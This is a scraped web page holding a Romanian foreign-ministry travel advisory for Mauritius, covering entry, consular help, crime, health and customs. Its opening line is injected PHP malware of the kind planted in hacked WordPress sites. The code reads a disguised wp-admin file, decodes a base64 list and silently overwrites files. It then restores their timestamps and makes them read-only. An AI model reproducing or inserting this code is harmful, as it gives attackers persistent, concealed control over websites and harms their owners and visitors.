$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Mauritius – O noua atitudine

Condiţii de intrare şi regim de şedere

Cetăţenii români pot intra pe teritoriul acestei ţări, fără viză, pentru o perioadă de 90 de zile într-un interval de 6 luni.

Cu toate acestea, vă recomandăm ca înaintea călătoriei să solicitaţi informaţii suplimentare asupra condiţiilor de intrare în Mauritius la ambasada acestui stat la Paris: 127, Rue de Tocqueville – 75017 Paris, tel. 0033142273019, fax. 0033140530291.


Asistenţă consulară

 

România nu are nici o formă de reprezentare diplomatică sau consulară de carieră în Mauritius.

Site-ul Comisiei Europene conţine informaţii utile privind protecţia consulară de care beneficiază cetăţenii UE inclusiv lista cu misiunile diplomatice ale ţărilor UE cu reprezentare în acest stat.

În calitate de cetăţean al Uniunii Europene, cetăţenii români pot solicita, în caz de necesitate, eliberarea unui titlu de călătorie în vederea întoarcerii în ţară, din partea misiunilor diplomatice ale ţărilor UE.

Cetăţenii romani care doresc să călătorească în Mauritius sau se află deja pe teritoriul său, sunt sfătuiţi să se adreseze Ambasadei României în Africa de Sud şi să îşi anunţe prezenţa în regiune, comunicând astfel propriile coordonate pentru a putea fi contactaţi în situaţii de urgenţă.

 


Ameninţări teroriste 

Terorismul este un fenomen global, nelocalizat, prin urmare nici statul Mauritius nu poate fi exclus din faţa acestei ameninţări. Mauritius nu a suferit atacuri teroriste directe pe teritoriul naţional.

Siguranţă şi criminalitate 

Delictele mărunte sunt comune şi este recomandabil să vă protejaţi lucrurile personale cu precădere în zonele frecventate de turişti (Port Louis, Grand Baie şi Flic en Flac).

Traficul de droguri este aspru pedepsit (45 ani închisoare), deţinerea a 15 g de cannabis, spre exemplu, este pedepsită cu 1 an închisoare şi 100.000 rupii mauritiene amendă, cauţiunea nefiind admisă. Este interzis importul sau deţinerea foiţei pentru ţigări.

Raportaţi orice incident poliţiei pentru turişti, la numărul de telefon 213 28 18.

Deoarece pirateria reprezintă o ameninţare semnificativă în zona Golfului Aden şi în Oceanul Indian, nu este recomandabilă efectuarea unor călătorii cu vase de agrement în afara ariilor protejate.

Cicloanele reprezintă un factor de risc semnificativ, în special în perioada noiembrie – mai.

În cazul unui ciclon nu părăsiți locuinţa şi aveţi în vedere faptul că autoturismele nu mai beneficiază de asigurare.

Dacă tranzitaţi un stat afectat de febră galbenă, înainte de a ajunge în Mauritius, trebuie să fiţi în posesia unui certificat medical care să ateste faptul ca ati fost vaccinat împotriva acestei boli.

În perioada octombrie – mai, Mauritius se confruntă cu apariţia virusului Chikungunya.  De asemenea, aproximativ 1% din populaţia adultă este afectată de SIDA. Homosexualitatea este ilegală.

Uniunea Europeană a publicat o listă a companiilor aeriene care fac obiectul interdicţiei la operare sau restricţiilor în spaţiul comunitar. Este recomandabilă consultarea acestei liste pe site-ul: http://air-ban.europa.eu.


Recomandări generale

  • Să evite orice deplasare pe timpul nopţii (indiferent de regiunea în care se află, dar mai ales în zonele izolate ale ţării), locurile aglomerate și demonstraţiile.
  • Să păstreze în locuri sigure documentele şi valorile personale, biletele de călătorie, banii, cărţile de credit şi să nu le expună în mod vizibil asupra lor sau în maşini.
  • În cazul călătoriei cu autobuzul sau trenul, să păstreze atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Să recurgă la operatori turistici acreditaţi şi să nu se îndepărteze de grupul turistic.
  • Să respecte anunţurile sau recomandările autorităţilor locale!
  • Pentru ieşirile în oraş, în special în zonele aglomerate, să lase documentele la hotel şi să păstreze numai o copie a actelor de identitate (paşaport, permis de şedere).
  • Să se adreseze Institutului Naţional de Sănătate Publică – Centrul Naţional de Supraveghere şi Control al Bolilor Transmisibile pentru a obţine informaţii cu privire la tipurile de vaccinuri care trebuie efectuate.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm să contactaţi poliţia locală, precum şi cea mai apropiată misiune UE.


Sistemul medical

Unităţile spitaliceşti private sunt bine utilate, dar în cazul necesităţii unor servicii medicale complexe, cele mai apropiate spitale cu posibilităţi în domeniu se află în Africa de Sud sau în La Reunion.

Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate înainte de a pleca într-o călătorie. Mai multe detalii găsiţi la adresele: www.cnas.ro şi www.ceass.ro.

Este bine ca asigurarea medicală să fie valabilă în toate ţările. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie valabilă pe teritoriul acestei ţări, în urma consultării cu companiile de asigurare. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc. Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.

Condiţii privind traficul auto

  • Starea drumurilor

Starea generală a reţelei rutiere variază şi se recomandă evitarea deplasărilor cu autoturismul pe timp de noapte.

  • Transportul public

Vă recomandăm ca transportul în Mauritius să fie asigurat prin intermediul pachetului de servicii contractat cu operatorul de turism, pe lângă cazare masă etc.

Utilizarea cărţilor de credit

În Mauritius există o reţea de bancomate numai în oraşele mari.

Regimul medicamentelor

Sunt interzise drogurile de orice tip şi substanţele dopante.

Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare!
Este recomandabil să aveţi asupra dvs. reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale. De asemenea, trebuie avută în vedere contactarea autorităţilor din Mauritius înainte de deplasarea pe teritoriul acestei ţări având asupra dvs. astfel de medicamente.

Reglementări vamale

Pentru informații privind reglementările vamale vă rugăm să contactaţi autorităţile acestei ţări.

Sursa: www.mae.ro

By o9admin